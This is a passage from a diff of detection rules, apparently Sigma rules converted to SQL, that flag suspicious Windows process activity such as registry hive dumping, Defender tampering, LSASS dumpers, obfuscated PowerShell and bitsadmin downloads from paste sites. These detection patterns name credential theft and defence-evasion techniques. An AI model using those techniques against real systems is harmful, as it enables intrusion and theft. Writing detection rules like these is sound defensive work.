"description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "status": "experimental", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.execution" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR 